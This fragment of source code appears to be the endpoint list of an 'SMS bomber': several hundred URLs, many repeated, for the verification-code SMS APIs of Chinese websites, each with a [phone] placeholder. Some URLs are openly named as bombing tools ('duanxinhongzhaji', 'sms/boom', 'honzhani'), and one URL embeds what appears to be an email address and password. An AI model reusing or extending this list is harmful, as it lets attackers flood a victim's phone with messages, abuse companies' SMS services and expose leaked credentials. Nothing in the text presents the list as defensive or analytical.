"https://www.4008123123.com/phhs_ios/isNotExistUser.action?r=0.4572958659946349?phone=[phone]", + "http://api.hiwemeet.com/register/auth_code?phone=[phone]", + "http://wsdj.baic.gov.cn/common/sms/vercode/send.do?mobile=[phone]", + "http://www.nacao.org.cn/eportal/ui?moduleId=692a74d178a7426180fa08f4b5531330&struts.portlet.action=/portlet/yzm!sendMsg.action&telPhone=[phone]&yzm=H137", + "https://passport.haochedai.com/UserForDeayou/phoneCode?callbackparam=jsonpReturn&phone=[phone]", + "http://ffp.airchina.com.cn/app/generateSmscode?phoneNum=[phone]&t=0.5165145328970137", + "http://passport2.chaoxing.com/num/phonecode?phone=http://s.juntu.com/member/index/getLoginCode?mobile=[phone]", + "http://www.ksdao.com/sendMsgCode?mobile=[phone]", + "http://m.tk.cn/tkmobile/service/member?function_code=dynamicLogin&login_mobile=[phone]", + "http://www.songhebao.com/serv/api/member/GetSMSCode.ashx?phone=[phone][phone]&lx=1", + "http://passport.kuaichecaifu.com/UserForDeayou/phoneCode?callbackparam=jsonpReturn&phone=[phone]&agent=9&_=1500773935216", + "http://www.yijiej.com/user/getVerifyCode?phone=[phone]", + "http://m.yuhuijob.com/skins/save_check.php?f=regyzm&uname=[phone]", + "http://m.ikuyu.cn/login/getvcode?phone=[phone]", + "http://passport.aplus.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", + "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", + "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", + "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", + "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", + "http://api.yinka.co/common/sms?cellphone=[phone]", + "http://www.v5kf.com/member/index/ajax_sms_code?mobile=[phone]", + "http://api.juewei.com//api/Verify/sendSms?_=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "http://m.cibyun.com/User/SendRegistCCP?MemberUserId=-1&SellerUserId=null&X-Requested-By=m.cibyun.com&X-Requested-Data=qmjpyeprwskgcihxbbx&phone=[phone]", + "http://www.wenbita.net/plugin.php?id=wq_smslogin&mod=sendcode&handlekey=bind&loginsubmit=yes&module=register&phone=[phone]", + "http://api.nfapp.southcn.com/nanfang_if/getVerifiCode?phoneNo=[phone]", + "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", + "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", + "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", + "http://api.nfapp.southcn.com/nanfang_if/getVerifiCode?phoneNo=[phone]", + "http://sso.toutiao.com/send_activation_code/?mobile=[phone]", + "http://tools.wx6.org/duanxinhongzhaji/?telcode=[phone]", + "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", + "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", + "http://bbs.fqlook.cn/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=7290e7db&mobile=[phone]", + "http://db.3z.cc/index.php?tp=front/reg&appid=0&pt=1&ver=2.2.4&imei=352286900745893&sign=c225f84dad88d1c3521fb0ec39e77d5c&op=verify&phone=[phone]", + "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", + "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", + "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", + "http://tel.kuaishang.cn/cl.php?tel=[phone]", + "http://passport.1yyg.com/JPData?action=send2Msg&userMobile=[phone]", + "http://www.52tanbao.com/tanbao-app-api/SendValidCode?telephone=[phone]", + "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", + "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", + "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", + "http://biz.sandnes.cn/msgapi.php?phone=[phone]", + "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", + "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", + "http://api.yinka.co/common/sms?cellphone=[phone]", + "http://sms.maogoo.cn/index.php?hm=[phone]", + "http://m.cibyun.com/User/SendRegistCCP?MemberUserId=-1&SellerUserId=null&X-Requested-By=m.cibyun.com&X-Requested-Data=qmjpyeprwskgcihxbbx&phone=[phone]", + "https://www.xiaoying.com/user/apiCheckRegister?callback=jQuery19105981196630189294_1488300711819&mobile=[phone]", + "http://passport.aplus.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", + "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", + "http://api.juewei.com//api/Verify/sendSms?_=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", + "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", + "http://tel.kuaishang.cn/cl.php?tel=[phone]", + "http://passport.1yyg.com/JPData?action=send2Msg&userMobile=[phone]", + "http://www.52tanbao.com/tanbao-app-api/SendValidCode?telephone=[phone]", + "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", + "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", + "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", + "http://biz.sandnes.cn/msgapi.php?phone=[phone]", + "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", + "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", + "http://john.huainanhai.com/mobile/send_mobile_code_v2?phone_no=86-[phone]", + "http://passport.1yyg.com/JPData?action=send2Msg&userMobile=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", + "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", + "http://gd.10086.cn/easy/product/order/getValidateRndCode.jsps?commCode=LLKC300&merchantCode=GD&mobile=[phone]", + "http://www.xjwvxz.com/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", + "http://www.zsbox.net/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", + "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", + "http://www.youmw.top/tool/dxhz/?hm=[phone]&ok=", + "http://zha.vvoso.com/honzhani.php?zha=[phone]&x=100", + "http://www.bjoil.com/bjoil/member/mobileVerify.action?tamp=1479798866609/bjoil/member/mobileVerify.action?tamp=1479798866609/bjoil/member/mobileVerify.action?tamp=1479798866609&mobile=[phone]", + "http://tools.wx6.org/duanxinhongzhaji/?telcode=[phone]", + "http://bsdt.jhga.gov.cn/egov/jhwas/jsp/info/checkmobile.jsp?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", + "http://survey.dxy.cn/forms/public/survey2/captcha?sid=102998&itemid=127053&phone=[phone]", + "http://n.youyuan.com/v20/yuan/get_registerMobile_code.html?mobile=[phone]&from=5599", + "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=1957&from=2&imgCode=", + "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", + "http://newweb.lumiai.com/api/isecurity/sms_captcha?mobile=[phone]", + "http://www.lxzbsjsm.com/auth/smscode.ashx?action=vd&aid=5813&mb=[phone]", + "http://lvyou.baidu.com/business/api/orderforward?callback=jQuery182032357188081368804_1490544543748&source=lvyou&phone=[phone]&qt=phone_captcha&sub_from=order_list&request_from=webapp&_=1490544543509", + "http://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&phoneNum=[phone]&uid=&code=", + "http://www.wsngo.com/reg/sendSmsCheck.html?phone=[phone]", + "http://www.iliangcang.com/i/mob_login?act=getCode&mobile=[phone]", + "http://m.nsyh001.com/user/ajax/Btnmobileverify?user_name=[phone]", + "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", + "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=773", + "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=1957&from=2&imgCode=", + "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", + "http://newweb.lumiai.com/api/isecurity/sms_captcha?mobile=[phone]", + "http://www.lxzbsjsm.com/auth/smscode.ashx?action=vd&aid=5813&mb=[phone]", + "http://m.nsyh001.com/user/ajax/Btnmobileverify?user_name=[phone]", + "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", + "http://m.anjuke.com/general/sendphonecode?phone=[phone]&captcha=", + "http://www.e8088.com/index/product/try!phoneVerifyCode.action?tipMessage=[phone]", + "http://uniservice.kugou.com/v2/activity/sendCode?call_number=[phone]&cb=kgJSONP239130071", + "http://www.reedoun.com/os/user/getCode?mobile=[phone]&type=1", + "http://m.anjuke.com/general/sendphonecode?phone=[phone]&captcha=", + "http://www.e8088.com/index/product/try!phoneVerifyCode.action?tipMessage=[phone]", + "http://uniservice.kugou.com/v2/activity/sendCode?call_number=[phone]&cb=kgJSONP239130071", + "http://www.reedoun.com/os/user/getCode?mobile=[phone]&type=1", + "http://hdh.10086.cn/common/validationIP?phone=[phone]", + "http://hdh.10086.cn/pc/dynamic?phoneNumber=[phone]&imageCode=4551&type=login", + "http://www.wfggw.com/getcode.asp?num=[phone]&_=1480403250456", + "http://www.shoujibao.uni-info.com.cn/send_register_verify.action?register_customer_name=[phone]", + "http://www.wfggw.com/getcode.asp?num=[phone]&_=1480403250456", + "http://www.shoujibao.uni-info.com.cn/send_register_verify.action?register_customer_name=[phone]", + "http://test2.p10155.cn:8075/sendCode.ashx?phonenum=[phone]", + "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", + "https://sso.scrcu.com/ebuisso/SendSMSVerificationCode?userId=0000&authType=03&mobile=[phone]&_=1480945303044", + "http: //www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", + "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]", + "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", + "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", + "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]", + "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", + "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", + "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", + "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", + "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", + "http://reg.lenovo.com.cn/captcha/canSend?mobile=[phone]&callback=getMobileCode&_=1480296216538", + "http://www.wfggw.com/getcode.asp?num=&d&_=1480403250456", + "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", + "https://sso.scrcu.com/ebuisso/SendSMSVerificationCode?userId=0000&authType=03&mobile=[phone]&_=1480945303044", + "http: //www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", + "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]", + "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", + "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", + "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", + "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", + "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", + "http://reg.lenovo.com.cn/captcha/canSend?mobile=[phone]&callback=getMobileCode&_=1480296216538", + "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", + "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", + "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", + "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", + "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", + "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", + "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", + "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]", + "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", + "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", + "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", + "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18307610929541763114_1547125502231&nation=CN&type=5&from_domain=i&verifycode=&_=1547125703761&phone=[phone]", + "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", + "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", + "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", + "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", + "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", + "https://sso.scrcu.com/ebuisso/SendSMSVerificationCode?userId=0000&authType=03&mobile=[phone]&_=1480945303044", + "http: //www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", + "http://www.csc108.com/mobile/sendRandomNum.json?mobile=[phone]", + "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]&version=oa.cnoa.cn", + "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", + "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", + "http://waimai.baidu.com/promotion/client/sendsms?phone=[phone]", + "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", + "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", + "http://m.zhenai.com/v2/register/resendMobileCode.do?baseInfo2.serviceMobile=[phone]", + "http://www.595959.wang/index.php/index/index/sendSms1?phone=[phone]", + "http://passport.fanli.com/login/ajaxLoginSendVerfiycode?jsoncallback=jQuery183044493322381181954_1486714320243&pos=601&mobile=[phone]&_=1486714329485", + "http://loan.ef008.cn/sms/sendSms?smsType=1&phone=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]&country=%2B86", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&accessType=1&circleId=100000055", + "http://mall.juzifenqi.com/termi/sendVerifySMSVH?mobile=[phone]&flag=1&verifyCode=", + "http://m.1mi.cn/wap/user/mobile_verify.json?mobile=[phone]&flag=0&identifying=", + "http://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.020283224898892227?mobileNo=[phone]&geetest_challenge=&geetest_validate=&geetest_seccode=", + "http://api.midukanshu.com/auth/mobileVerify?mobile=[phone]", + "http://care.seewo.com/easicare/account/dynamic/code?userName=[phone]&isLogin=false", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]&token=", + "http://dafeiyu.cn/sms/boom?mobile=[phone]&config=1&num=2", + "http://buckle.lvronghui.com/promotion/transfer.php?phone=[phone]", + "http://renjie.houhan.com/api/Register/send_sms?mobile=[phone]&host=renjie.houhan.com", + "http://jiuji.lyqchain.cn/Api/System/SendMsgCode?format=json?Tel=[phone]", + "http://mall.juzifenqi.com/termi/sendVerifySMSVH?mobile=[phone]&flag=1&verifyCode=", + "http://www.jiedai315.com/SendCode.ashx?Mobile=[phone]&Identifier=6", + "http://www.fcbox.com/noshiro/retrievePhoneMessagePreventAttacks?mobilePhone=[phone]&smsType=5", + "http://m.zhenai.com/v2/register/resendMobileCode.do?baseInfo2.serviceMobile=[phone]", + "http://ct.ctrip.com/me/register/Verify?name=%E5%90%B4%E5%A5%87&email=357058116%40qq.com&mobile=[phone]&passwd=xiyu8187", + "http://passport.fanli.com/login/ajaxLoginSendVerfiycode?jsoncallback=jQuery183044493322381181954_1486714320243&pos=601&mobile=[phone]&_=1486714329485", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]&mobilestep=1&verification_code=&verify_flag=&verify_global=ma624mg0j80trr7ldvwcl15c1f&c_aver=1.0&c_src=2&c_v=5.3.1.24&devid=63599267906091", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]&country=%2B86", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&accessType=1&circleId=100000055", + "http://passport.17house.com/login/sendSMSForMobileLogin?mobile=[phone]", + "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", + "https://h5.youzan.com/usercenter/member/member/mobilesmscode.json?kdt_id=19161003&mobile=[phone]&verify_times=1", + "http://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://micservice.91qinqu.com/huieryun-identity/api/v1/authgateway/91qq/sendsms?mobile=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "http://wap.ghs.net/wap/wxregister-checkMobile.html?uname=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://ucenter.inyuapp.com/v1/login/mobile/code?mobile=[phone]&country_code=86", + "http://sms.321mh.com/user/v1/sendsms?mobile=[phone]&service=zymk&countryCode=&imgCode=&refresh=0&localtime=&client-channel=store_tencent&loglevel=3&client-type=android&client-version=4.9.1", + "http://ndapi.nexttao.com/api/user/request_mobile_code?mobile=[phone]", + "http://bank.wo.cn/hand/getRandCode?phone=[phone]&flag=3", + "http://home.ecook.cn/user/code?phone=[phone]", + "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947590&Service=home-club-web&backurl=&mobilephone=[phone]", + "https://user.qunar.com/webApi/logincode.jsp?mobile=[phone]&vcode=&origin=wechat$$&action=register&type=implicit", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", + "http://www.cmpassport.com/openapi/sendDynaPwd?account=[phone]", + "http://api.gaotu100.com/user/v2/send_passcode?captcha_mode=NETEASE&type=3&mobile=[phone]&code_type=0", + "http://cms.51fenmi.com/api/base/public/getCode?mobile=[phone]", + "http://api.yinka.co/common/sms?cellphone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://weizhang.58.com/user/login/getcode?mobile=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + 